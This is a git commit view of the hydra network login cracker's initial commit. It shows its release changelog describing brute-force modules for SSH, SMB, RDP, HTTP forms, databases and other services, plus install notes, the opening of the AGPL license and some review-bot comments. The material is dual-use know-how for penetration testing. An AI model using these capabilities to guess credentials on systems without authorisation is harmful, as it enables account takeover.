initial commit

U-marc-win4\marc 2014-04-24 16:49:18 +02:00
commit 6a94f708e8
122 changed files with 60195 additions and 0 deletions

700
CHANGES Normal file

@ -0,0 +1,700 @@
Changelog for hydra
-------------------
Release 7.7
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach")
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton for submitting)
* Bugfixes for -x option:
- password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
- fixed crash when used together with -e option
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues. surprised it were so few and unlikely stuff :-)
Release 7.6
* Added a wizard script for hydra based on a script by Shivang Desai <shivang.ice.2010@gmail.com>
* Added module for Siemens S7-300 (submitted by Alexander Timorin and Sergey Gordeychik, thanks!)
* HTTP HEAD/GET: MD5 digest auth was not working, fixed (thanks to Paul Kenyon)
* SMTP Enum: HELO is now always sent, better 500 error detection
* hydra main:
- fixed a bug in the IPv6 address parsing when a port was supplied
- added info message for pop3, imap and smtp protocol usage
* hydra GTK: missed some services, added
* dpl4hydra.sh:
- added Siemens S7-300 common passwords to default password list
- more broad searching in the list
* Performed code indention on all C files :-)
* Makefile patch to ensure .../etc directory is there (thanks to vonnyfly)
Release 7.5
* Moved the license from GPLv3 to AGPLv3 (see LICENSE file)
* Added module for Asterisk Call Manager
* Added support for Android where some functions are not available
* hydra main:
- reduced the screen output if run without -h, full screen with -h
- fix for IPv6 and port parsing with service://[ipv6address]:port/OPTIONS
- fixed -o output (thanks to www417)
- warning if HYDRA_PROXY is defined but the module does not use it
- fixed an issue with large input files and long entries
* hydra library:
- SSL connections are now fixed to SSLv3 as some SSL servers fail otherwise, report if this gives you problems
- removed support for old OPENSSL libraries
* HTTP Form module:
- login and password values are now encoded if special characters are present
- ^USER^ and ^PASS^ are now also supported in H= header values
- if you the colon as a value in your option string, you can now escape it with \: - but do not encode a \ with \\
* Mysql module: protocol 10 is now supported
* SMTP, POP3, IMAP modules: Disabled the TLS in default. TLS must now be
defined as an option "TLS" if required. This increases performance.
* Cisco module: fixed a small bug (thanks to Vitaly McLain)
* Postgres module: libraries on Cygwin are buggy at the moment, module is therefore
disabled on Cygwin
Release 7.4.3 FIX RELEASES for bugs introduced in 7.4
* Quickfix for people who do not have libssh installed (won't compile otherwise)
* Quickfix for http-get/http-head and irc module which would not run due a new feature.
* Fix for the ssh module that breaks an endless loop if a service becomes unavailable (thanks to shark0der(at)gmail(dot)com for reporting)
Release 7.4
* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
* Added support for win8 and win2012 server to the RDP module
* Better target distribution if -M is used
* Added colored output (needs libcurses)
* Better library detection for current Cygwin and OS X
* Fixed the -W option
* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
* Fixed HTTP Form module false positive when no answer was received from the server
* Fixed SMB module return code for invalid hours logon and LM auth disabled
* Fixed http-{get|post-form} from xhydra
* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
* Added debug mode option to usage (thanks to Anold Black)
Release 7.3
* Hydra main:
- Added -F switch to quit all targets if one pair was found (for -M)
- Fixed a bug where hydra would terminate after reporting a successful
login when an account would accept any password
- Fixed a bug with very large wordlists (thanks to sheepdestroyer for reporting!)
- Enhanced the module help
* configure script:
- Added fix Oracle library inclusion, thanks to Brandon Archer!
- Added --nostrip option to prevent binary stripping (requested by Fedora
maintainer)
* Added a Makefile patch by the Debian maintainers to support their
SecurityHardeningBuildFlags for the wheezy build as requested
* dpl4hydra: added install directory support
* All code: message cleanups
* SNMP module
- originally already supported write and v2 although this was not in the
module help output. Added :-)
- added SNMPv3 MD5/SHA1 authentication support, though beta still
* HTTP module:
- fixed HTTP NTLM auth session
- implemented errata fix for HTTP digest md5-sess algorithm
- set default path to /
* HTTP Form module:
- set default path to /
- support HTTP/1.0 redirects
- fix failed condition check when pcre is not used
* IMAP module: fixed auth detection
* POP3 module: Updated auth and capability detection
* Oracle module: fixed bad handling
* Oracle listener module: fixed hash size handling
* Telnet/Cisco/Cisco-enable modules: support "press ENTER" prompts
* FTP module:
- Fixed a bug where 530 messages were incorrectly handled
- Clarification for the usage of ftps
* Mysql module: added patch from Redhat/Fedora that fixes compile problems
* Added IDN and PCRE support for Cygwin
Release 7.2
* Speed-up http modules auth mechanism detection
* Fixed -C colonfile mode when empty login/passwords were used (thanks to
will(at)configitnow(dot)com for reporting)
* The -f switch was not working for postgres, afp, socks5, firebird and ncp,
thanks to Richard Whitcroft for reporting!
* Fixed NTLM auth in http-proxy/http-proxy-url module
* Fixed URL when being redirected in http-form module, thanks to gash(at)chaostreff(dot)at
* Fix MSSQL success login condition, thanks to whistle_master(at)live(dot)com
* Fix http form module: optional headers and 3xx status redirect, thx to Gash
* Fix in configure script for --prefix option, thanks to dazzlepod
* Update of the dpl4hydra script by Roland Kessler, thanks!
* Small fix for hydra man page, thanks to brad(at)comstyle(dot)com
Release 7.1
* Added HTTP Proxy URL enumeration module
* Added SOCKS4/SOCKS5 proxy support with authentication
* Added IPv6 support for SOCKS5 module
* Added -e r option to try the reversed login as password
* Rewrote -x functionality as the code caused too much trouble (thanks to
murder.net7(at)gmail.com for reporting one of the issues)
* Fixed a bug with multiple hosts (-M) and http modules against targets that
are virtual servers. Well spotted by Tyler Krpata!
* Fixed SVN IPv6 support and updated deprecated calls
* Fixed RDP failed child connection returned value and false positive issues
reported by Wangchaohui, thanks!
* Fixed restore file functionality, was not working together with -o option
* Fix in http-form module for bug introduced in 7.0
* Fixed xhydra specific parameter value for http-proxy module
* minor enhancements
Release 7.0
* New main engine for hydra: better performance, flexibility and stability
* New option -u - loop around users, not passwords
* Option -e now also works with -x and -C
* Added RDP module, domain can be passed as argument
* Added other_domain option to smb module to test trusted domains
* Small enhancement for http and http-proxy module for standard ignoring servers
* Lots of bugfixes, especially with many tasks, multiple targets and restore file
* Fixes for a few http-form issues
* Fix smb module NTLM hash use
* Fixed Firebird module deprecated API call
* Fixed for dpl4hydra to work on old sed implementations (OS/X ...)
* Fixed makefile to install dpl4hydra (thx @sitecrea)
* Fixed local buffer overflow in debug output function (required -d to be used)
* Fixed xhydra running warnings and correct quit action event
Release 6.5
* Improved HTTP form module: getting cookie, fail or success condition, follow
multiple redirections, support cookie gathering URL, multiple user defined
headers
* Added interface support for IPv6, needed for connecting to link local fe80::
addresses. Works only on Linux and OS/X. Information for Solaris and *BSD welcome
* Added -W waittime between connects option
* The -x bruteforce mode now allows for generated password amounts > 2 billion
* Fix if -L was used together with -x
* Fixes for http- modules when the http-...://target/options format was used
* Fixed a bug in the restore file write function that could lead to a crash
* Fixed XMPP module jabber init request and challenge response check, thx "F e L o R e T"
* Fix: if a proxy was used, unresolveable targets were disabled. now its fine
* Fix for service://host/ usage if a colon was used after the URI without a
port defined
Release 6.4
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* Configure script now honors /etc/ld.so.conf.d/ directory
* Add more SMB dialects
Release 6.3
* Added patch by Petar(dot)Kaley(at)gmail.com which adds nice icons to cygwin hydra files
* Added patch by Gauillaume Rousse which fixes a warning display
* New Oracle module (for databases via OCI, for TNS Listener passwd, for SID enumeration)
* New SMTP user enum module (using VRFY, EXPN or RCPT command)
* Memory leak fix for -x bruteforcing option reported by Alex Lau
* Fix for svn module, for some versions it needs one more lib, thanks to the
Debian team for reporting!
* Fix ssh module, on connection refused a credential could be lost
* Fix http-form module, a redirect was not always followed
* QA on all modules for memory leaks
* Better gtk detection (to not even try xhydra compilation when its useless)
* First blant attempt for configuring to x64 systems (Linux and *BSD)
* Updated network password cracker comparison on the web page (for hydra and new ncrack)
* Indented all source code
Release 6.2
* Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files :-) )
* Forgot to rename ssh2 to ssh in xhydra, fixed
* Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module
* Fix SASL PLAIN auth method issue
* Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap
* Added man pages from Debian maintainers
* Checked Teamspeak module, works on TS2 protocol
* Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah !
* New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support
* Add SCRAM-SHA1 auth to IMAP module
* Add module usage help (-U)
* Add support for RFC 4013: Internationalized Strings in SASL ("SASLPrep")
* Rename smtpauth module to smtp
* Add SASL + TLS support for NNTP
* Bugfix SASL DIGEST-MD5, response could be wrong sometime, mainly on 64bits systems
* Bugfix rlogin module, some auth failure could not be detected accurately
* Bugfix rsh module, some auth failure could not be detected accurately
* New module: IRC is not dead ! use to find general server password and /oper credential
* Add SSL support for VMware Authentication Daemon module
* Bugfix CVS module, should work now, why does nobody report this ??
* Bugfix Telnet module, when line mode is not available
* Add support for new syntax <service-name>://<target>[:<port-number>][/<parameters>]
* Add TLS support for SIP
* STILL OPEN: Fixed a problem in hydra where a login+pw test was lost when an arm/child was quitting
Release 6.1
* More license updates for the files for the Debian guys
* Fix for the configure script to correctly detect postgresql
* Add checks for libssh v0.4 and support for ssh v1
* Merge all latest crypto code in sasl files
* Fix SVN compilation issue on openSUSE (tested with v11.3)
Release 6.0
* Added GPL exception clause to license to allow linking to OpenSSL - Debian people need this
* IPv6 support finally added. Note: sip and socks5 modules do not support IPv6 yet
* Changes to code and configure script to ensure clean compile on Solaris 11,
OSX, FreeBSD 8.1, Cygwin and Linux
* Bugfix for SIP module, thanks to yori(at)counterhackchallenges(dot)com
* Compile fixes for systems without OpenSSL or old OpenSSL installations
* Eliminated compile time warnings
* xhydra updates to support the new features (david@)
* Added CRAM-MD5, DIGEST-MD5 auth mechanism to the smtp-auth module (david@)
* Added LOGIN, PLAIN, CRAM-(MD5,SHA1,SHA256) and DIGEST-MD5 auth mechanisms to the imap and pop3 modules (david@)
* Added APOP auth to POP3 module (david@)
* Added NTLM and DIGEST-MD5 to http-auth module and DIGEST-MD5 to http-proxy module (david@)
* Fixed VNC module for None and VLC auth (david@)
* Fixes for LDAP module (david@)
* Bugfix Telnet module linemode option negotiation using win7 (david@)
* Bugfix SSH module when max auth connection is reached (david@)
Release 5.9
* Update for the subversion module for newer SVN versions (thanks to David Maciejak @ GMAIL dot com)
* Another patch by David to add the PLAIN auth mechanism to the smtp-auth module
* mysql module now has two implementations and uses a library when found (again
thanks to David Maciejak @ GMAIL dot com - what would hydra be without him)
* camiloculpian @ gmail dot com submitted a logo for hydra - looks cool, thanks!
* better FTP 530 error code detection
* bugfix for the SVN module for non-standard ports (again david@)
Release 5.8
* Added Apple Filing Protocol (thank to "never tired" David Maciejak @ GMAIL dot com)
* Fixed a big bug in the SSL option (-S)
Release 5.7
* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??
Release 5.6 PRIVATE VERSION
###########
* Moved to GPLv3 License (lots of people wanted that)
* Upgraded ssh2 module to libssh-0.4.x (thanks to aris (at) 0xbadc0de.be for
the 0.2 basis)
* Added firebird support (by David Maciejak @ GMAIL dot com)
* Added SIP MD5 auth patch (by Jean-Baptiste Aviat <jba [at] hsc [dot] `french tld`)
* Removed Palm and ARM support
* Fix for cygwin which falsely detected postgres library when there was none.
* Several small bugfixes
Release 5.4
###########
* Fixes to the http modules as some Apache installations are picky
* The MySQL module also works with mysqld-5.0, updated
* Added AS/400 return code checks to pop3 module
* Fixed memory leaks in the http-form module.
* Implemented a proposal by Jean-Baptiste.BEAUFRETON (at) turbomeca.fr to
check for "530 user unknown" message in the ftp module
* Added a performance patch by alejandro.mendiondo (at) baicom.com. This one
needs stability testing!
* Beautification to remove compiler warnings of modern gcc
Release 5.3
###########
* Added NTLM support modules for pop3, imap, smtp-auth and http-proxy.
Work done by ilo (at) reversing.org. THANKS!
* Added a http form module, thanks to phil (at) irmplc.com
* Fixed a bug in the vnc module (thanks to kan (at) dcit.cz)
* Input files may *not* contain null bytes. I might fix that in the future
but currently I have enough other things on my todo sheet.
Thanks to didiln (at) gmail.com for reporting.
Release 5.2
###########
* Again again some fixes for the ssh2 module. This is the last try. If it
finally does not work reliable, I am throwing out that library!
Thanks to bykhe@mymail.ch for the patch
* Added a new module: VMWare-Auth! Thanks to david.maciejak@gmail.com!
Release 5.1
###########
* Again some fixed for the ssh2 module. Sorry. And still it might not work
in all occasions. The libssh is not as mature as we all wish it would be :-(
* HYDRA_PROXY_AUTH was never used ... weird that nobody reported that. fixed.
* Fixed bug in the base64 encoding function
* Added an md5.h include which is needed since openssl 0.9.8
* Added an enhacement to the FTP module, thanks to piotr_sobolewski@o2.pl
* Fixed a bug when not using passwords and just -e n/s
Release 5.0
###########
! THIS IS A THC - TAX - 10TH ANNIVERSARY RELEASE ! HAVE FUN !
* Increadible speed-up for most modules :-)
* Added module for PC-Anywhere, thanks to david.maciejak(at)kyxar.fr!
* Added module for SVN, thanks to david.maciejak(at)kyxar.fr!
* Added --disable-xhydra option to configure, thanks to david.maciejak(at)kyxar.fr!
- he is becoming the top supporter :-)
* Added module for SIP (VoIP), thanks to gh0st(at)staatsfeind.org
* Added support for newer sap r/3 rfcsdk
* Added check to the telnet module to work with Cisco AAA
* Fix for the VNC module, thanks to xmag
* Small enhancement to the mysql plugin by pjohnson(at)bosconet.org
Release 4.7
###########
* Updated ssh2 support to libssh v0.11 - you *must* use this version if
you want to use ssh2! download from http://www.0xbadc0de.be/?part=libssh
This hopefully fixes problems on/against Sun machines.
After fixing, I also received a patch from david maciejak - thanks :-)
* Added an attack module for rlogin and rsh, thanks to
david.maciejak(at)kyxar.fr!
* Added an attack module for the postgres database, thanks to
diaul(at)devilopers.org! (and again: david maciejak sent on in as well)
* JoMo-Kun sent in an update for his smbnt module. cool new features:
win2k native mode, xp anonymous account detection, machine name as password
* Hopefully made VNC 3.7 protocol versions to work. please report.
* Switched http and https service module to http-head, http-get and
https-get, https-head. Some web servers want HEAD, others only GET
* An initial password for cisco-enable is now not required anymore. Some
people had console access without password, so this was necessary.
* Fixed a bug in xhydra which did not allow custom ports > 100
! Soon to come: v5.0 - some cool new features to arrive on your pentest
machine!
Release 4.6
###########
* Snakebyte delivered a module for Teamspeak
* Snakebyte updated the rexec module for the Hydra Palm version
* Snakebyte updated xhydra to support the new Telnet success response option
* Clarified the Licence
* Updated the ldap module to support v3, note that "ldap" is now specified as
"ldap2" or "ldap3". Added wrong version detection.
Release 4.5
###########
* The configure script now detects Cygwin automatically :-)
* The telnet module now handles the OPT special input. Specify the string
which is displayed after successfully a login. Use this if you have false
positives.
* Made smtp-auth module more flexible in EHLO/HELO handling
* Fixed some glitches in the SAP/R3 module (correct sysnr, better port
handling) thanks to ngregoire@exaprobe.com !
* Fixed some glitches in the http/https module
* Fixed a big bug in snakebyte's snmp module
* Warning msg is now displayed if the deprecated icq module is used
* Added warning message to the ssh2 module during compilation as many people
use the newest libssh version which is broken.
Release 4.4
###########
* Fixed another floating point exception *sigh*
* Fixed -C colon mode
* Added EHLO support for the smtp-auth module, required for some smtpd
Release 4.3
###########
* Fixed a divide by zero bug in the status report function
* Added functionality for skipping accounts (cvs is so nice to report this)
* Snakebyte sent in a patch for cvs for skipping nonexisting accounts
* <lerrahn@syss.de> sent in a patch to fix proxy support for the HTTP module
without proxy authentication
Release 4.2
###########
* Snakebyte sent in modules for SNMP and CVS - great work!
* Snakebyte also expanded the gtk gui to support the two new modules
* Justin <connectjunkie@gmail.com> sent in a module for smtp-auth ... thanks!
* master_up@post.cz sent in some few patches to fix small glitches
* Incorporated a check from the openbsd port
Release 4.1
###########
* Snakebyte wrote a very nice GTK GUI for hydra! enjoy!
* due a bug, sometimes hydra would kill process -1 ... baaaad boy!
* found passwords are now also printed to stdout if -o option is used
* <je@sekure.net> reported that hydra wouldn't complain on ssh2 option if
compiled without support, fixed
* <llevier@argosnet.com> made an official port for FreeBSD and sent me a
diff to exchange the MD4 of libdes to openssl
* <vh@helith.net> noticed that hydra will crash on big wordlists as
the result of the mallocs there were not checked, fixed
* Snakebyte expanded his PalmOS Version of hydra to nntp and fixed vnc
* Increased the wait time for children from 5 to 15 seconds, as e.g.
snakebyte reported detection problems
* Fixed some display glitches
Release v4.0
############
#
# This is a summary of changes of the D1 to D5 beta releases and shows
# what makes v4.0 different from 3.1.
# Have fun. Lots of it.
#
# By the way: I need someone to program a nice GTK frontend for hydra,
# would YOU like to do that and receive the fame? Send an email to vh@thc.org !
#
* For the first time there is not only a UNIX/source release but additionally:
! Windows release (cygwin compile with dll's)
! PalmPilot release
! ARM processor release (for all your Zaurus, iPaq etc. running Linux)
* There are new service attack modules:
! ms-sql
! sap r/3 (requires a library)
! ssh v2 (requires a library)
* Enhancements/Fixes to service attack modules:
! vnc module didnt work correctly, fixed
! mysql module supports newer versions now
! http module received a minor fix and has better virtual host support now
! http-proxy supports now an optional URL
! socks5 checks now for false positives and daemons without authentication
* The core code (hydra.c) was rewritten from scratch
! rewrote the internal distribution functions from scratch. code is now
safer, less error prone, easier to read.
! multiple target support rewritten which now includes intelligent load
balancing based on success, error and load rate
! intelligently detect maximum connect numbers for services (per server if
multiple targets are used)
! intelligent restore file writing
! Faster (up to 15%)
! Full Cygwin and Cygwin IPv6 support
* added new tool: pw-inspector - it can be used to just try passwords which
matches the target's password policy
#
# This should be more than enough! :-)
#
... the rest below is history ...
###########################################################################
#
# New Hydra v4.0 code branch
#
Release D5
* added patches by kan@dcit.cz which enhance the proxy module and provide
a small fix for the http module
* small beautifcations to make the compiler happy
! This is the final beta version before public release
- please test everything!
Release D4
* Tick made an update to his configure-arm
* snakebyte@gmx.de added imap, vnc and cisco module support to PalmPilot
* fixed VNC module
* enhanced mysql module to work also with 4.0.x (and all future protocol 10
mysql protocol types)
* enhanced socks5 module to identify daemons which do not require
authentication, and false positive check (otherwise dante would report all
tries as successful)
* fixed a bug in configure for D3 which resulted in compile problems on
several platforms requiring libcrypto
Release D3
* added sapr3 attack module (requires libsdk.a and saprfc.h)
* added ssh2 attack module (requires libssh)
* snakebyte@gmx.de added telnet module support for PalmPilot
* fixed the mssql module, should work now
* fixed -e option bug
* fixed -C option bug (didnt work at all!!)
* fixed double detection (with -e option) plus added simple dictionary
double detection
* target port is now displayed on start
Release D2
* added better virtual host support to the www/http/https/ssl module
(based on a patch from alla@scanit.be)
* added ARM support (does not work for libdes yet, ssl works), done by
Tick <tick@thc.org>
* added Palm support (well, in reality it is more a rewrite which can use
the hydra-modules), done by snakebyte <snakebyte@gmx.de>
* added ms-sql attack module (code based on perl script form HD Moore
<hdm@digitaloffense.net>, thanks for contributing)
Release D1 (3 March 2003)
* rewrote the internal distribution functions from scratch. code is now
safer, less error prone, easier to read.
* multiple target support rewritten which now includes intelligent load
balancing based on success, error and load rate
* intelligently detect maximum connect numbers for services (per server if
multiple targets are used)
* intelligent restore file writing
* Faster (up to 15%)
* Full Cygwin and Cygwin IPv6 support
* added new tool: pw-inspector - it can be used to just try passwords which
matches the target's password policy
###########################################################################
v3.0 (FEBRUARY 2004) PUBLIC RELEASE
* added a restore function to enable you to continue aborted/crashed
sessions. Just type "hydra -R" to continue a session.
NOTE: this does not work with the -M option! This feature is then disabled!
* added a module for http proxy authentication cracking ("http-proxy") :-)
* added HTTP and SSL/CONNECT proxy support. SSL/CONNECT proxy support works
for *all* TCP protocols, you just need to find a proxy which allows you to
CONNECT on port 23 ...
The environment variable HYDRA_PROXY_HTTP defines the web proxy. The
following syntax is valid: HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
Same for HYDRA_PROXY_CONNECT.
If you require authentication for the proxy, use the HYDRA_PROXY_AUTH
environment variable:
HYDRA_PROXY_AUTH="login:password"
* fixed parallel host scanning engine (thanks to m0j0.j0j0 for reporting)
* A status, speed and time to completion report is now printed every minute.
* finally updated the README
v2.9 (FEBRUARY 2004) PRIVATE RELEASE
...
v2.8 (JANUARY 2004) PRIVATE RELEASE
...
v2.7 (JANUARY 2004) PUBLIC RELEASE
* small fix for the parallel host code (thanks to m0j0@foofus.net)
v2.6 (DECEMBER 2003) PUBLIC RELEASE
* fixed a compiling problem for picky compilers.
v2.5 (NOVEMBER 2003) PUBLIC RELEASE
* added a big patch from m0j0@foofus.net which adds:
- AAA authentication to the cisco-enable module
- Running the attacks on hosts in parallel
- new smbnt module, which uses lanman hashes for authentication, needs libdes
! great work and thanks !
* changed code to compile easily on FreeBSD
* changed configure to compile easily on MacOS X - Panther (cool OS btw ...)
v2.4 (AUGUST 2003) PUBLIC RELEASE
* public release
=== 2.3 stuff===
* added mysql module (thanks to mcbethh@u-n-f.com)
* small fix in vnc (thanks to the Nessus team)
* added credits for vnc-module (FX/Phenolite)
* new ./configure script for better Solaris and *BSD support (copied from amap)
* updated to new email/www addresses => www.thc.org
v2.2 (OCTOBER 2002) PUBLIC RELEASE
* fixed a bug in the -P passwordfile handling ... uhhh ... thanks to all
the many people who reported that bug!
* added check if a password in -P passwordfile was already done via the
-e n|s switch
v2.1 (APRIL 2002) PUBLIC RELEASE
* added ldap cracking mode (thanks to myself, eh ;-)
* added -e option to try null passwords ("-e n") and passwords equal to the
login ("-e s"). When specifying -e, -p/-P is optional (and vice versa)
* when a login is found, hydra will now go on with the next login
v2.0 (APRIL 2002) PRIVATE RELEASE
! with v1.1.14 of Nessus, Hydra is a Nessus plugin!
* incorporated code to make hydra a nessus plugin (thanks to deraison@cvs.nessus.org !)
* added smb/samba/CIFS cracking mode (thanks to deraison@cvs.nessus.org !)
* added cisco-enable cracking mode (thanks to J.Marx@secunet.de !)
* minor enhancements and fixes
v1.7 (MARCH 2002) PRIVATE RELEASE
* configure change to better detect OpenSSL
* ported to Solaris
v1.6 (FEBRUARY 2002) PUBLIC RELEASE
* added socks5 support (thanks to bigbud@weed.tc !)
v1.5 (DECEMBER 2001) PRIVATE RELEASE
* added -S option for SSL support (for all TCP based protocols)
* added -f option to stop attacking once a valid login/pw has been discovered
* made modules more hydra-mod compliant
* configure stuff thrown out - was not really used and too complicated,
wrote my own, lets hope it works everywhere ;-)
v1.4 (DECEMBER 2001) PUBLIC RELEASE
* added REXEC cracking module
* added NNTP cracking module
* added VNC cracking module (plus the 3DES library, which is needed) - some
of the code ripped from FX/Phenolite :-) thanks a lot
* added PCNFS cracking module
* added ICQ cracking module (thanks to ocsic <pisco@private.as>!!)
* for the pcnfs cracking module, I had to add the hydra_connect_udp function
* added several compactibility stuff to work with all the M$ crap
v1.3 (September 2001) PUBLIC RELEASE
* uh W2K telnetd sends null bytes in negotiation mode. workaround implemented.
* Rewrote the finish functions which would sometimes hang. Shutdowns are faster
now as well.
* Fixed the line count (it was always one to much)
* Put more information in the outpufile (-o)
* Removed some configure crap.
v1.2 (August 2001) PRIVATE RELEASE
* Fixed a BIG bug which resulted in accounts being checked serveral times. ugh
* Fixed the bug which showed the wrong password for a telnet hack. Works for
me. please test.
* Added http basic authentication cracking. Works for me. please test.
* Fixed the ftp cracker module for occasions where a long welcome message was
displayed for ftp.
* Removed some compiler warnings.
v1.1 (May 2001) PUBLIC RELEASE
* Added wait+reconnect functionality to hydra-mod
* Additional wait+reconnect for cisco module
* Added small waittimes to all attack modules to prevent too fast reconnects
* Added cisco Username/Password support to the telnet module
* Fixed a deadlock in the modules, plus an additional one in the telnet module
v1.0 (April 2001) PUBLIC RELEASE
* Verified that all service modules really work, no fix necessary ;-)
... so let's make it public
* Changed the LICENCE
v0.6 (April 2001) PRIVATE RELEASE
* Added hydra-cisco.c for the cisco 3 times "Password:" type
* Added hydra-imap.c for the imap service
* Fixed a bug in hydra-mod.c: empty logins resulted in an empty
hydra_get_next_password() :-(, additionally the blocking/recv works better
now. (no, not better - perfect ;-)
* Fixed a bug in hydra-telnet.c: too many false alarms for success due some
mis-thinking on my side and I also implemented a more flexible checking
* Fixed hydra-ftp.c to allow more weird reactions
* Fixed all ;-) memory leaks
v0.5 (December 2000) PUBLIC RELEASE
* NOTE WE HAVE GOT A NEW WWW ADDRESS -> www.thehackerschoice.com
* added telnet protocol
* exchanged snprintf with sprintf(%.250s) to let it compile on more platforms
but still have buffer overflow protection.
* fixed a bug in Makefile.in (introduced by Plasmo ,-)
v0.4 (August 2000) PUBLIC RELEASE
* Plasmoid added a ./configure script. thanks!
v0.3 (August 2000)
* first release
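Review bot: In the "Release D1 (3 March 2003)" entry the year looks wrong: D1 is listed under the "New Hydra v4.0 code branch" betas, yet it is dated before v2.4 (AUGUST 2003) and v3.0 (FEBRUARY 2004) further down the file, so please check whether 2004 was meant and correct it. The entries from Release v4.0 through 7.7 carry no date at all, which makes the ordering hard to verify; adding release dates there would help. Two smaller points in the same file: the 7.7 entry has a stray quote in `Max Kosmach")`, and contributor addresses appear in plain form in some entries (for example the 7.6 wizard script credit) but as (at)/(dot) in others, so one convention should be chosen.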

11
INSTALL Executable file

@ -0,0 +1,11 @@
type "./configure", then "make" and finally "sudo make install"
For special modules you need to install software packages before
you run "./configure":
Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
For the Oracle login module, install the basic and SDK packages:
http://www.oracle.com/technetwork/database/features/instant-client/index.html
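Review bot: INSTALL is added with the executable bit set although it is plain text with nothing to run; commit it as mode 644 so documentation does not carry an execute permission. The Oracle Instant Client link on the last line is plain http, so a reader following it reaches the SDK download over an unauthenticated channel; use the https form if the site serves it. The package lines omit sudo while the first line uses "sudo make install", and the Redhat/Fedora line has no libidn or MySQL development package where the Ubuntu/Debian line lists libidn11-dev and libmysqlclient-dev, so state whether those modules are intentionally unsupported there.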

683
LICENSE Executable file

@ -0,0 +1,683 @@
[see the end of the file for the special exception for linking with OpenSSL
- debian people need this]
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
